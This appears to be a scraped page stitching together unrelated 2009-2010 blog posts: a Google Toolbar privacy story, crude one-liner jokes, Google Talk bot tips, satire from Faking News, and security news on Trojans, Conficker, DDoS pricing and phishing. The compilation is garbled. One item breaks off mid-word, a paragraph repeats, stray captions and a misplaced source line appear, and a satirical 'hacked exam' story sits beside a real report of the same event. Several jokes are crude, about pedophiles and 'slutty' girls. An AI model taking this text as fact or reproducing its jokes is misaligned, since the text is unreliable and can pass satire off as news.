
In a Monday blog post, Harvard professor and noted Google critic Ben Edelmen provided video evidence* of the Google toolbar transmitting data back to the Mountain View Chocolate Factory after he chose to disable the application in the browser window he was currently using.

The Google toolbar offers two disable options: one is meant to disable the toolbar “permanently,” and the other is meant to disable the app “only for this window.”

In a statement passed to The Reg, Google has acknowledged the bug. According to the statement, the bug affects Google Toolbar versions 6.3.911.1819 through 6.4.1311.42 for Internet Explorer. An update that fixes the bug is now available here, and the company intends to automatically update users’ toolbars sometime today.

The statement also says that the bug does not occur if you open a new tab after disabling the toolbar for a particular window. In the statement, Google goes on to say that the bug disappears if you restart your browser, but this doesn’t quite make sense. If you’re interested in disabling Google toolbar for a particular window, you aren’t going to close that window.

“For that option to work as its name promises, Google Toolbar must cease transmissions immediately,” Edelman says. “Fact is, the ‘Disable Google Toolbar only for this window’ option doesn’t work at all: It does not actually disable Google Toolbar for the specified window.”

It would appear that in saying the bug is fixed when the browser relaunches, Google is referring to a second bug Edelman uncovered. The Harvard prof also found that the toolbar continued to transmit data when he attempted to disable it through Internet Explorer’s “Manage Add-ons” window.

With the Google toolbar, certain “enhanced features” require the transmission of data back to Google servers. These features include the ability to view a website’s Google PageRank, essentially a measure of its importance on the web at large, and the new Sidewiki, a means of adding meta-comments to webpages. Using a network monitor, Edelman confirmed that if “enhanced features” are activated, Google collects domain names and associated directories, filenames, URL parameters, and search terms.

The user chooses whether to turn on “enhanced features,” but Edelman argues that it’s much too easy for a user to do so without completely realizing the consequences. The toolbar’s standard installation routine launches a “bubble message” that pushes readers to turn on the features, he says, and it’s less than clear about what data is being transmitted.

“The feature is described as ‘enhanced’ and ‘helpful,’ and Google chooses to tout it with a prominence that indicates Google views the feature as important,” Edelman writes. “Moreover, the accept button features bold type plus a jumbo size (more than twice as large as the button to decline). And the accept button has the focus – so merely pressing Space or Enter (easy to do accidentally) serves to activate Enhanced Features without any further confirmation.”

Yes, he continues, the message points out that the toolbar “tells us what site you’re visiting by sending Google the url.” But he argues this stops short of explaining that it collects everything from directories, filenames, and URL parameters to search keywords.

What’s more, Edelman says, turning off “enhanced features” is more difficult than turning them on – especially for the average Joe. It appears that the features can’t be turned off unless you uninstall the entire toolbar. Or “disable” it. But that doesn’t always work. Or at least it didn’t until Edelman noticed it didn’t.

* Video evidence at

(http://www.benedelman.org/spyware/images/googletoolbar-jan10/disablex-video-012110.html)

-More often than not, when someone is telling me a story all I can think about is that I can’t wait for them to finish so that I can tell my own story that’s not only better, but also more directly involves me.

-Nothing sucks more than that moment during an argument when you realize you’re wrong.

-I don’t understand the purpose of the line, “I don’t need to drink to have fun.” Great, no one does. But why start a fire with flint and sticks when they’ve invented the lighter?

-Have you ever been walking down the street and realized that you’re going in the complete opposite direction of where you are supposed to be going? But instead of just turning a 180 and walking back in the direction from which you came, you have to first do something like check your watch or phone or make a grand arm gesture and mutter to yourself to ensure that no one in the surrounding area thinks you’re crazy by randomly switching directions on the sidewalk.

-Does anyone else feel like a complete fraud when someone refers to them as an adult?

-I totally take back all those times I didn’t want to nap when I was younger.

-Is it just me, or are 80% of the people in the “people you may know” feature on Facebook people that I do know, but I deliberately choose not to be friends with?

-Do you remember when you were a kid, playing Nintendo and it wouldn’t work? You take the cartridge out, blow in it and that would magically fix the problem. Every kid in America did that, but how did we all know how to fix the problem? There was no internet or message boards or FAQ’s. We just figured it out. Today’s kids are soft.

-There is a great need for sarcasm font.

-Sometimes, I’ll watch a movie that I watched when I was younger and suddenly realize I had no idea what the f was going on when I first saw it.

-I think everyone has a movie that they love so much, it actually becomes stressful to watch it with other people. I’ll end up wasting 90 minutes shiftily glancing around to confirm that everyone’s laughing at the right parts, then making sure I laugh just a little bit harder (and a millisecond earlier) to prove that I’m still the only one who really, really gets it.

-How the hell are you supposed to fold a fitted sheet?

-I would rather try to carry 10 plastic grocery bags in each hand than take 2 trips to bring my groceries in.

- I think part of a best friend’s job should be to immediately clear your computer history if you die.

-The only time I look forward to a red light is when I’m trying to finish a text.

- A recent study has shown that playing beer pong contributes to the spread of mono and the flu. Yeah, if you suck at it.

- LOL has gone from meaning, “laugh out loud” to “I have nothing else to say”.

- I have a hard time deciphering the fine line between boredom and hunger.

- Answering the same letter three times or more in a row on a Scantron test is absolutely petrifying.

- Whenever someone says “I’m not book smart, but I’m street smart”, all I hear is “I’m not real smart, but I’m imaginary smart”.

- How many times is it appropriate to say “What?” before you just nod and smile because you still didn’t hear what they said?

- I love the sense of camaraderie when an entire line of cars teams up to prevent a dick from cutting in at the front. Stay strong, brothers!

- Every time I have to spell a word over the phone using ‘as in’ examples, I will undoubtedly draw a blank and sound like a complete idiot. Today I had to spell my boss’s last name to an attorney and said “Yes that’s G as in…(10 second lapse)..ummm…Goonies”

-What would happen if I hired two private investigators to follow each other?

- While driving yesterday I saw a banana peel in the road and i nstinctively swerved to avoid it…thanks Mario Kart.

- MapQuest really needs to start their directions on #5. Pretty sure I know how to get out of my neighborhood.

- Obituaries would be a lot more interesting if they told you how the person died.

- I find it hard to believe there are actually people who get in the shower first and THEN turn on the water.

-Shirts get dirty. Underwear gets dirty. Pants? Pants never get dirty, and you can wear them forever.

-I can’t remember the last time I wasn’t at least kind of tired.

- Bad decisions make good stories

-Whenever I’m Facebook stalking someone and I find out that their profile is public I feel like a kid on Christmas  morning who just got the Red Ryder BB gun that I always wanted. 546 pictures? Don’t mind if I do!

- Is it just me or do high school girls get sluttier & sluttier every year?

-If Carmen San Diego and Waldo ever got together, their offspring would probably just be completely invisible.

-Why is it that during an ice-breaker, when the whole room has to go around and say their name and where they are from, I get so incredibly nervous? Like I know my name, I know where I’m from, this shouldn’t be a problem….

-You never know when it will strike, but there comes a moment at work when you’ve made up your mind that you just aren’t doing anything productive for the rest of the day.

-Can we all just agree to ignore whatever comes after DVDs? I don’t want to have to restart my collection.

-There’s no worse feeling than that millisecond you’re sure you are going to die after leaning your chair back a little too far.

-I’m always slightly terrified when I exit out of Word and it asks me if I want to save any changes to my ten page research paper that I swear I did not make any changes to.

- “Do not machine wash or tumble dry” means I will never wash this ever.

-I hate being the one with the remote in a room full of people watching TV. There’s so much pressure. ‘I love this show, but will they judge me if I keep it on? I bet everyone is wishing we weren’t watching this. It’s only a matter of time before they all get up and leave the room. Will we still be friends after this?’

-I hate when I just miss a call by the last ring (Hello? Hello? Dammit!), but when I immediately call back, it rings nine times and goes to voicemail. What’d you do after I didn’t answer? Drop the phone and run away?

- I hate leaving my house confident and looking good and then not seeing anyone of importance the entire day. What a waste.

-When I meet a new girl, I’m terrified of mentioning something she hasn’t already told me but that I have learned from some light internet stalking.

-I like all of the music in my iTunes, except when it’s on shuffle, then I like about one in every fifteen songs in my iTunes.

-Why is a school zone 20 mph? That seems like the optimal cruising speed for pedophiles…

- As a driver I hate pedestrians, and as a pedestrian I hate drivers, but no matter what the mode of transportation, I always hate cyclists.

-Sometimes I’ll look down at my watch 3 consecutive times and still not know what time it is.

-It should probably be called Unplanned Parenthood.

-I keep some people’s phone numbers in my phone just so I know not to answer when they call.

-Even if I knew your social security number, I wouldn’t know what do to with it.

-Even under ideal conditions people have trouble locating their car keys in a pocket, hitting the G-spot, and Pinning the Tail on the Donkey – but I’d bet my ass everyone can find and push the Snooze button from 3 feet away, in about 1.7 seconds, eyes closed, first time every time…

-My 4-year old son asked me in the car the other day “Dad what would happen if you ran over a ninja?” How the hell do I respond to that?

-It really pisses me off when I want to read a story on CNN.com and the link takes me to a video instead of text.

-I wonder if cops ever get pissed off at the fact that everyone they drive behind obeys the speed limit.

-I think the freezer deserves a light as well.

-I disagree with Kay Jewelers. I would bet on any given Friday or Saturday night more kisses begin with Miller Lites than Kay.

You can do lot of interesting stuff with Google Talk like get alert notifications, save bookmarks to delicious, manage web calendars, set reminders, write blogs, and so much more.

Such features can be easily integrated into Google Talk through ‘bots’ which, in simple English, are like virtual friends who are online 24×7 and will always respond with a smile to your questions or requests.

Here are the eleven most useful ‘bots’ that transform Google Talk into a more useful program:

1. imfeeds@gmail.com – Add this IM Feeds bot as your Google Talk buddy and you’ll be able to read any blog or website that syndicates content via RSS feeds.

To subscribe to a website in GTalk, simply send a new IM message that says “sub labnol.org” where labnol.org is the site address that you want to read inside Google Talk.

2. friendfeed@bot.im – This secret bot lets you post to FriendFeed from Google Talk. You may submit either hyperlinks or text messages.

3. imified@imified.com – This imified bot turns Google Talk into a real powerhouse.

You can post bookmarks to delicious, send messages to Twitter, submit blog entries to WordPress, Tumblr or Blogger, manage events in Google Calendar, shorten long URLs, run whois and so on.

4. inezhabot@gmail.com – Like IM Feeds, iNezha bot helps you read feeds inside Google Talk but this is slightly more versatile. For instance, you can simply say “digg” and it will show a list of all feeds that match that search term so you don’t have to type (or copy-paste) feed addresses.

5. Translation – This is a free service from Google that helps you translate words from a foreign language into your native language. Just add the relevant bot (e.g. hi2en@bot.talk.google.com for Hindi to English or en2hi@bot.talk.google.com for English to Hindi) as your buddy, send him a message and it will get translated instantly.

6. Use Google Talk with Twitter – Invite twitter@twitter.com to become your friend in Google Talk and verify your account. Now whenever you IM this new friend, the message will automatically publish on your twitter account.

7. Set Task Reminders – If you need to remember something important, Google Talk can send you reminders for that event.

Just add timer to your Twitter friend’s list and then add twitter@twitter.com to your buddy list in Gtalk. Now if you want to get a reminder after 50 minutes, send a direct message to twitter  like “d timer 50 pick kids from school” and a reminder will automatically pop up in your Google Talk after 50 minutes.

8. Transliteration – If you want to chat in your mother tongue (like Hindi or Tamil) but feel more comfortable using the English keyboard, Google Transliteration bot will come in handy.

For instance, add en2hi.translit@bot.talk.google.com to you friend’s list in GTalk and all messages you type in English will get transliterated in the language of your choice.  Available only for a few Indian languages.

9. Xpenser – With xpenser, you can record travel expenses via email, SMS or even Google talk. Add xpenserbot@gmail.com as your buddy and send a message like “lunch 33.2 with Bill Gates” and that will be added as an expense to your online spreadsheet that can be accessed from anywhere.

10. Ping.fm – Like Imified, ping.fm is one of the most useful Google bots out there especially if you are a social networking or micro-blogging addict.

Add pingdotfm@gmail.com to Gtalk and you can communicate with twitter, jaiku, wordpress, identi.ca, facebook, myspace, bebo, friendfeed, linkedin, tumblr, plaxo, friendster, delicious and more.

11. Meshly – Add meshly@gmail.com as your friend and you’ll be able to post web link to your Meshly account via Google Talk. You can also add tags, categories and description to your hyperlink via Gtalk itself.

The application is perfect for business as well as for your own enjoyment. Now you can easily remote control your PowerPoint presentations, Mouse Cursor or simply explore the content of your computer directly from your mobile phone.

Tones of handy features will be available after installing the software. You will be able to change the tracks and videos played on Media Player or Winamp, browse for artists, albums or adjust the volume. The application will also give you remote access to programs such as Windows Explorer, Internet Explorer or Firefox. In the same time you will be able to Run commands on your computer or send text messages to your desktop.

The program consists of two parts – the client and the server (both being written in Java). The former is located into a J2ME capable mobile phone with Bluetooth capabilities while the latter is placed in the computer you wish to remotely control.

So, all you need for this software to run is a mobile phone with Bluetooth™ support and a Bluetooth dongle installed on your computer.

In order to start using the Mobilewitch Bluetooth Remote Control you first need to download and install both Mobile Application and PC Server. In case of Nokia mobile phones, the Nokia PC Suite will automatically recognize and prompt you to install the application on your handset.

After the installation is complete, please use the following steps:

Step 1

Start the PC Server application first

Step 2

Start the Mobile Application. On Nokia phones the shortcut is located in Menu/Applications/Collection. The phone will automatically start searching for active devices.

Once both devices are connected you will be able to access the Mobilewitch Bluetooth Remote Control Menu from your phone.

From this menu you will be able to control your mouse cursor, keyboard and the following programs, if installed on your computer: Windows Explorer, Firefox, Window Media Player, Internet Explorer, Winamp and Powerpoint. Please note that each application you would like to control has to be first started from the computer and needs to be Always On Top of your desktop.

Features

- Remotely control Mouse, Keyboard, PowerPoint, Winamp, Windows Media Player and much more
- Get access to your desktop from your phone
- Bluetooth setup free! Simply connect from your phone
- Customize your applications through Keymaps or VB and JScripts
- Supports all PC Bluetooth solutions Toshiba, Windows, BlueSoleil and Widcomm/Broadcom

“Watching India TV is awesomeness.” said the paataal ka bauna (the dwarf from the underground) as he expressed his deepest delight after the results of the poll were announced, where India TV grossed more than three-fourth of the total valid votes polled. Vampires and other members of the consortium belonging to the Telangana region didn’t participate in the poll to register their protest for the formation of a separate state.

“I am pretty sure our bhoot brethrens from Telangana would have voted no differently.” said the kapde churane wala bhoot (the ghost who stole your clothes), expressing confidence that the results would have been no different either ways. “There is a near unanimity among all of us on the issue of India TV. We all love when they break news.” added the cloth-stealing ghost.

One of the thousands of news stories of India TV that Chudails love to watch again and again

Your email:

 

When asked why these allegedly ghoulish creatures loved India TV so much, all the ghosts and witches started laughing devilishly. They laughed continuously for around two hours, pausing thirteen times in between to take commercial breaks, before their leader, the pyaaz maangne wali chudail (the onion loving witch) spoke up.

“We used to love Ramsay Brothers, but those guys stopped producing quality movies and moved to television with Zee Horror Show. But even that show stopped when the world moved into 21^st century. Our TRPs were falling like crazy. And then, the 9/11 attacks happened; the world got besotted with terrorists thereafter. We were like, what-the-fuck, nobody seemed to be terrified of us anymore. Some of the good people like David Icke tried to blame 9/11 on people like us, but no one took them seriously. We were so depressed.” said the onion loving witch, as other members of the consortium nodded in agreement.

The members surprisingly revealed that they were not so upbeat when Rajat Sharma launched the channel in 2004. They thought it was just another news channel for human beings. But their interest level went up when they saw Shakti Kapoor molesting a girl on India TV. Excited at the scenes, the members decided to become patrons of India TV.

“Our loyalty paid off. Soon we were back in news and business.” said the witch, grinning and smiling like SPS Rathore. The members vehemently denied that they had any stake in India TV. “We are poor people; we can’t invest or buy stakes in your modern businesses. But if we had money, we surely would have invested in India TV.” admitted the witch.

All the witches, ghosts, vampires, black-magicians, devils, etc. have wished all the best to India TV for the new year and the new decade.

Source: http://www.fakingnews.com/2009/12/chudails-vote-india-tv-as-the-best-news-channel-of-last-decade/

Source: fivethirtyeight

New Delhi. “Have you ever farted loudly in public?” was the question that popped up on his computer screen when Ankit Agarwal was taking CAT 2009 online at the Delhi Business School center here. A shocked and upset Ankit looked around to find equally dumbfounded faces of fellow test takers at the center. A few minutes passed when all of them realized that CAT servers had been hacked.

“I found all the students straining their eyes and looking around with puzzling looks at each other, and I sensed that something was wrong. But I still answered the fart question by choosing the option (b), which was in affirmative, assuming IIMs wanted to test us on some abstruse parameter as MBAs are often accused of creating fart. And to my horror, the next thing on screen was a middle finger, telling me I was a loser. I immediately knew that the servers were hacked.” Ankit recounted his harrowing experience.

Students were shocked to see such images on their computer screen as they took CAT 2009 online

Several centers around the country reported the same problem with the students asked absolutely ridiculous and offensive questions such as “have you ever slept with a potato in your underwear?” and “will you mop up the poop of pet dog of your boss to get promotion?”, all of them ending with a middle finger on the screen when students cared to choose an available option. It was the first day of online CAT (Common Admission Test) for admission to the six (as of today) IIMs and many other well known and lesser known MBA institutes.

“IIMs are known to change the pattern of CAT quite often, therefore many students thought that maybe these questions had some hidden meanings. But we felt like losers once that middle finger appeared on the screen. I talked to many of my friends and all of them feel the same. The questions appeared to have been taken straight out of a show of Sach Ka Saamna.” Chetan Pandit, another CAT test taker shared his experience.

IIMs have called for an emergency meeting this evening to discuss the problem and to nail down the hacker, but the event has already caused huge embarrassment to them. Many students, who otherwise had bunked the online CAT to see movies, were seen demonstrating in front of the centers asking IIMs to go back to paper-and-pen tests. Samajwadi Party activists too joined the protests and broke computers as a symbol of protest.

This unfortunate incident has also caused many test conducting agencies and internet security agencies to pitch for their services to IIMs and ask them to outsource CAT to them. These agencies have also approached Ministry of Human Resource Development with what they termed as ‘lucrative’ proposals.

Meanwhile the students are fuming over the possibility that they will have to take the test again, which is often touted as their ticket to a better life. Most of the students believe, and more importantly want their parents to believe, that they were performing exceptionally well at the test before the hackers struck and denied them an opportunity to change their lives.

30 Nov 2009

The Common Admission Test (CAT) examination, administrated for admission to seven prestigious Indian Institutes of Management (IIMs) and 150 more management institute has been affected by virus attack, as per the contractor and IIMB director, which continued for the third day today.

This year for the first time, CAT is being conducted online throughout India at 104 centers for about 2,41,000 aspirants for about 2500 seats at seven IIMs. The exam was spread over 10 day from 28 November to 07 December 2009. The trouble started at the start of exam on day 1 and continued for the third day today.

First it was stated as server crash, but later the blame was put on a virus. But the details of virus are not disclosed. This give rise to speculation that the virus may be only an excuse.

The so-called virus has affected only at 24 centers distressing about 15% of candidates. Neither IIM directors nor CAT committee nor the contractor Prometric, an US based company and it’s Indian associate NIIT are disclosing any further details.

“This shows the total unprofessional approach by all concerned, where there is either no or not adequate planning, execution, dry run, mock test, stress testing, back-up plan existed”, said Rakesh Goyal, Director General of CRPCC and MD of Sysman Computers Private Limited, a leading IT Security firm.

The launch of the online CAT meant delivery of exams at more than 360 testing laboratories in 104 centres. “It is an ambitious project, but well within the means and experience of Prometric,” Prometric said.

The laboratories closed on Sunday include 11 in Bangalore, eight in Bhopal, six each in Lucknow and Mumbai, five in Delhi, four in Ghaziabad, two each in Varanasi and Hyderabad and one each in Bhubaneswar, Chandigarh, Nagpur, Kolkata and Coimbatore.

Agitated students and their parents are concerned about their future and the mental agony bourn by them.

By Nick Heath

18 September 2009

http://software.silicon.com/security/0,39024655,39525925,00.htm

Malware developers are going open source in an effort to make their malicious software more useful to fraudsters.

By giving criminal coders free access to malware that steals financial and personal details, the malicious software developers are hoping to expand the capabilities of old Trojans.

According to Candid Wüest, threat researcher with security firm Symantec, around 10 per cent of the Trojan market is now open source.

The move to an open source business model is allowing criminals to add extra features to their malware.

“The advantages are that you have more people involved in developing it, so someone who is into cryptography could add a cryptographic plug-in or somebody who does video streaming could add remote streaming of the desktop,” Wüest said.

Releasing Trojans as open source dates back to 1999, when the Cult of the Dead Cow group released the source code for its Trojan called Back Orifice.

More recently, the developers of the Limbo Trojan published its source code in an effort to boost take-up following a slump in its use by fraudsters.

Following its release in 2007, the Limbo Trojan became the most widely used Trojan in the world but fell from favour in 2008 after the more sophisticated Zeus Trojan was released, according to security company RSA.

There is a big cash incentive to be the dominant Trojan, with infected machines and the financial and personal details they capture worth millions of dollars on the black market. The Limbo Trojan kit was previously sold to fraudsters for $350 per time before it went open source, while the Zeus Trojan today sells for between $1,000 to $3,000.

However, head of new technologies at RSA Uri Rivner said the move to become open source had not reversed Limbo’s decline in fortunes.

“It is a move to the same business model as that behind any open source project – to give away a basic version and sell more advanced versions, professional services or customisations.

“At the beginning of it going open source it was big news but people have since stopped investing in it.

“It is not the best Trojan any more but because it’s open source you can try it as your first Trojan and it is still used in some places,” he said.

Limbo’s popularity continues to slump, despite numerous features in the basic version that allow criminals to add extra fields for PIN numbers into fake banking websites and capture the keystrokes and the files saved on an infected computer.

And while open source may not have boosted Limbo’s fortunes, it also brings with it separate problems for the fraudsters: open sourcing code also places it in the hands of security professionals.

“If you make [the Trojan] open source that means that a security company can find the source code and it is easier to make a general heuristic detection for it, as they know what could be in it,” Symantec’s Wüest said.

The majority of Trojan infections occur via driv- by downloads, where the malware is automatically downloaded after browsing an infected website, or messages sent via social networking sites that encourage people to download a Trojan masquerading as a legitimate security update, according to RSA’s Rivner.

These infection methods are proving far more effective at getting Trojans onto machines than earlier techniques such as sending an email with a link to an infected file or attachment.

RSA analysts say these new methods have fuelled an exponential growth in the rate of infection, with the security firm detecting 613 Trojan infections in August 2008 compared to 19,102 in August 2009.

November 2, 2009

http://www.mxlogic.com/securitynews/viruses-worms/conficker-worm-could-be-weaponized-web-security-researcher-warns574.cfm

In the year since the inception of the Conficker worm, a malicious strain of virus that has infected computers all over the globe, security researchers have tracked its spread to as many as 7 million machines.

Although internet security researchers at the Conficker Working Group advise that it is impossible to track the exact number of PCs infected by Conficker, the latest estimates put the worm’s spread at around the 7 million mark, a milestone in the making of a huge botnet, according to Computerworld.

Botnets are controlled by hackers, cyber criminals or sometimes governments for the purpose of launching spam, malware and distributed denial-of-service attacks (DDOS), which can overpower website servers with malicious traffic that slows or crashes websites.

As an element of cyber war, DDOS attacks require a large enough botnet to overpower defenses, according to security experts. Andre DiMino, co-founder of The Shadowserver Foundation, said a botnet the size of Conficker could be “weaponized” in a cyber attack.

“This is certainly a botnet that could be weaponized,” DeMino said, according to Computerworld. “When you have a net of this magnitude, the sky’s the limit in terms of what could be done.”

DDOS attacks launched last July shut down government, banking and commercial sites in the U.S. and South Korea. Smaller attacks have hit sites like Twitter, Facebook and news websites.

October 27, 2009

The Information Technology (Amendment) Act 2008 comes into force from 27 October 2009. The amended act provides for tightening procedures and safeguards for monitoring and interception of data to prevent computer and cyber crimes.

“The IT (Amendment) Act 2008 came into force today,” an official statement said.

Besides monitoring and interception, the amended Act also makes Indian Computer Emergency Response Team (CERT-In), a body created as per the act of parliament. CENRT-In has been provided with wider powers and responsibilities to deals with computer security and various situations arising from cyber attacks.

The IT (Amendment) Act 2008 was passed by both the houses of Parliament on December 22 and 23, 2008. The Act was notified after the assent of President on February 5, 2009.

The amendment and notified rules pertaining to various sections of the act, dealing with Procedure and Safeguards for Interception, Monitoring and Decryption of Information, Blocking Access of Information by Public and Monitoring and Collecting Traffic Data.

The Information Technology Act was enacted in 2000 with a view to provide legal recognition to e-commerce and e-transactions, to facilitate e-governance and prevent computer-based crimes.

However, the rapid increase in the use of internet has led to a spate in crime like child pornography, cyber terrorism, publishing sexually explicit content in electronic form and video voyeurism. So, penal provisions were required to be included in the Information Technology Act, 2000.

For more details – http://pib.nic.in/release/release.asp?relid=53617

If you’ve recently login Gmail with a public computer at cyber cafe or a Internet-enabled system that is not administrated by you (e.g. office Desktop/Laptop that you don’t have root access privilege), remember to keep an eye at your Gmail account activities.

It doesn’t matter you’re login Gmail with HTTPS connection or Remote Desktopback to your secured system at home/office, a software keylogger running as service or hardware keylogger chip seated inside Desktop keyboard can easily recording all keystrokes pressed or capturing screen when you about to copy and paste the password in login form.

After your Google Account is hacked by keylogger, they are not likely to change your password for fun. Instead, the hackers will like to access your Gmail silently for other activities that interest them, e.g. confidential emails, social networks, accounting related login such as online banking, PayPal, eBay auction, etc.

So, how could you tell if someone has accessed your Gmail recently?

Login to your Gmail and look at the bottom of page. There you read a statement similar to this

Last account activity: 48 minutes ago on this computer. Details
(as shown in the screenshot below; highlighted in white):

After your Google Account is hacked by keylogger, they are not likely to change your password for fun. Instead, the hackers will like to access your Gmail silently for other activities that interest them, e.g. confidential emails, social networks, accounting related login such as online banking, PayPal, eBay auction, etc.

^{Gmail account activity may able to tell if you Google Account has been hacked by a keylogger.}

Click the Details hyperlink, a pop-up page will shows you the table of Google Account login details – Access Type, IP Address, and Date/Time when those login took place.

At the bottom of Detail page, there is your current computer IP address that you can take note for next login audit (keep a habit of conducting login audit whenever you login to Gmail):

This computer is using IP address 89.211.85.96.

The IP Address of computer that you normally use to access Gmail is not likely changes (frequently). If it’s an office computer that access to Internet via proxy server, that WAN IP is rather f

Free Hide Folder works like a computer security software that can lock and hide your important files and no one will be able to access them. Using this tool you can add password to selected files and folders and make them unreachable from everyone. Now if you don’t want to share any file or folder with anyone, simply lock the folder using Free Hide Folder.

Key Features of Free Hide Folder

1. Hides folder completely with strong password
2. Password protection to access locked folder
3. Lock as many folders as you want, no limit!
4. Simple and easy-to-use user interface
5. Supports Windows 9x/Me/NT/2000/XP/2003/Vista

October 20, 2009

http://news.cnet.com/8301-27080_3-10379115-245.html

Security researchers have discovered a way to steal cryptographic keys that are used to encrypt communications and authenticate users on mobile devices by measuring the amount of electricity consumed or the radio frequency emissions.

The attack, known as differential power analysis (DPA), can be used to target an unsuspecting victim either by using special equipment that measures electromagnetic signals emitted by chips inside the device or by attaching a sensor to the device’s power supply, Benjamin Jun, vice president of technology at Cryptography Research, said on Tuesday. Cryptography Research licenses technology that helps companies prevent fraud, piracy, and counterfeiting.

An oscilloscope can then be used to capture the electrical signals or radio frequency emissions and the data can be analyzed so that the spikes and bumps correlate to specific activity around the cryptography, he said.

An oscilloscope and simple antenna can capture electromagnetic emissions from mobile devices. The large spikes correspond to secret keys used during cryptographic activity.

(Credit: Cryptography Research)

“While the chip performs cryptography it is massaging the secret key around in various ways. This processing causes information about the key to leak through the power consumption itself,” said Jun.

For instance, someone with the proper equipment could steal the cryptographic key from a device three feet away in a cafe in as short a time as a few minutes, he said. An attacker could replicate the key with the information and use it to read a victim’s e-mail or pretend to be the user in sensitive online transactions.

Smartphones and PDAs have been found to leak data unless they have countermeasures in place to protect against it, which Cryptography Research offers, according to Jun.

He would not say exactly which devices could be snooped on in this manner and said he did not know of any attacks in the wild using this method.

“I think we’re about to start seeing it on smartphones,” he said. “These attacks are not theoretical.”

This type of attack first surfaced about 10 years ago on cash register terminals and postage meters. Similar data leakage was found with smartIDs, secure USB tokens, smart cards, and cable boxes, he said.

Countermeasures can involve randomizing to throw noise into the measurements or changing the way the computation is done, Jun said.

Asked to comment on how threatening this type of attack could be, cryptography expert Bruce Schneier said the basic question is who stands to lose?

“Honestly, I don’t care if someone hacks a cable box–it’s not my money. Similarly, I don’t care how often a bank gets robbed as long as the bank doesn’t deduct the losses out of my personal account,” he said in an e-mail. “But if someone hacks my phone and either steals service that I am charged for, or causes me enough hassle to change my phone number, that’s bad.”

DUBAI – Saudi Arabia tops all Gulf countries in attacks by Internet hackers, UAE daily Emirates Business reported on Thursday, citing software firm Trend Micro.

Of all the recorded cyber attacks in the first nine months of this year in the Gulf, 64 percent were directed at Saudi Arabia and 20 percent at the UAE.

There were 769,698 cases of “compromised systems breakdown” in Saudi Arabia and 248,034 in the UAE, according to Trend Micro data.

Kuwait recorded 94,910, followed by Bahrain at 60,440 and Oman with 37,105 cyber attacks.

Due to high concentration of wealth, Internet security experts put the Gulf at high-risk of cyber threats as criminals try to steal vital data from the public, including information such as bank details and credit card information.

The PCI DSS standard, as of September 2009 (DSS v 1.2), includes the following 12 requirements for best security practices:

Build and Maintain a Secure Network

1. Install and maintain a firewall configuration to protect cardholder data

2. Do not use vendor-supplied defaults for system passwords and other security parameters

Protect Cardholder Data

3. Protect stored cardholder data

4. Encrypt transmission of cardholder data across open, public networks

Maintain a Vulnerability Management Program

5. Use and regularly update anti-virus software

6. Develop and maintain secure systems and applications

Implement Strong Access Control Measures

7. Restrict access to cardholder data by business need-to-know

8. Assign a unique ID to each person with computer access

9. Restrict physical access to cardholder data

Regularly Monitor and Test Networks

10. Track and monitor all access to network resources and cardholder data

11. Regularly test security systems and processes

Maintain an Information Security Policy

12. Maintain a policy that addresses information security

The PCI DSS may also be called PCI compliance or PCI requirements.

By Robert McMillan ,

IDG News Service,

October 15, 2009

http://www.networkworld.com/news/2009/101509-with-botnets-everywhere-ddos-attacks.html?hpg1=bn

Cyber-crime just doesn’t pay like it used to.

Security researchers say the cost of criminal services such as distributed denial of service, or DDoS, attacks has dropped in recent months. The reason? Market economics. “The barriers to entry in that marketplace are so low you have people basically flooding the market,” said Jose Nazario, a security researcher with Arbor Networks. “The way you differentiate yourself is on price.”

Criminals have gotten better at hacking into unsuspecting computers and linking them together into so-called botnet networks, which can then be centrally controlled. Botnets are used to send spam, steal passwords, and sometimes to launch DDoS attacks, which flood victims’ servers with unwanted information. Often these networks are rented out as a kind of criminal software-as-a-service to third parties, who are typically recruited in online discussion boards.

DDoS attacks have been used to censor critics, take down rivals, wipe out online competitors and even extort money from legitimate businesses. Earlier this year a highly publicized DDoS attack targeted U.S. and South Korean servers, knocking a number of Web sites offline.

Are botnet operators having to cut costs like other businesses in these troubled economic times? Security researchers don’t know if that’s been a factor, but they do say that the supply of infected machines has been growing. In 2008, Symantec’s Internet sensors counted an average of 75,158 active bot-infected computers per day, a 31 percent jump from the previous year.

DDoS attacks may have cost hundreds or even thousands of dollars per day a few years ago, but in recent months researchers have seen them going for bargain-basement prices.

Nazario has seen DDoS attacks offered in the US$100-per-day range, but according to SecureWorks Security Researcher Kevin Stevens, prices have dropped to $30 to $50 on some Russian forums.

And DDoS attacks aren’t the only thing getting cheaper. Stevens says the cost of stolen credit card numbers and other kinds of identity information has dropped too. “Prices are dropping on almost everything,” he said.

While $100 per day might cover a garden-variety 100MB/second to 400MB/second attack, it might also procure something much weaker, depending on the seller. “There’s a lot of crap out there where you don’t really know what you’re getting,” said Zulfikar Ramzan, a technical director with Symantec Security Response. “Even though we are seeing some lower prices, it doesn’t mean that you’re going to get the same quality of goods.”

In general, prices for access to botnet computers have dropped dramatically since 2007, he said. But with the influx of generic and often untrustworthy services, players at the high end can now charge more, Ramzan said.

Millions of people have gotten “urgent” emails asking them to take immediate action to prevent some impending disaster. “Our bank has a new security system. Update your information now or you won’t be able to access your account,” or “We couldn’t verify your information; click here to update your account.” Sometimes the email claims that something awful will happen to the sender (or a third party), as in “The sum of $30,000,000 is going to go to the Government unless you help me transfer it to your bank account.”

People who click on the links in these emails may see a web page that looks like a legitimate site they’ve visited before. Because the page looks familiar, these people enter their username, password, or other private information on the site. What they’ve actually done is given an unknown third party all the information needed to hijack their account, steal their money, or open up new lines of credit in their name. They just fell for a phishing attack.

The concept behind such an attack is pretty simple: Someone masquerades as someone else in an effort to fool you into sharing personal or other sensitive information with them. Phishers can masquerade as just about anyone, including banks, email and application providers, online merchants, online payment services, and even governments. And while some of these attacks are crude and easy to spot, many of them are sophisticated and well constructed. That fake email from “your bank” can look very real; the bogus “login page” you’re redirected to can seem completely legitimate.

The good news is there are things you can do to steer clear of phishing attacks:

• Be careful about responding to emails that ask you for sensitive information.You should be wary of clicking on links in emails or responding to emails that are asking for things like account numbers, user names and passwords, or other personal information such as social security numbers. Most legitimate businesses will never ask for this information via email. Google doesn’t.

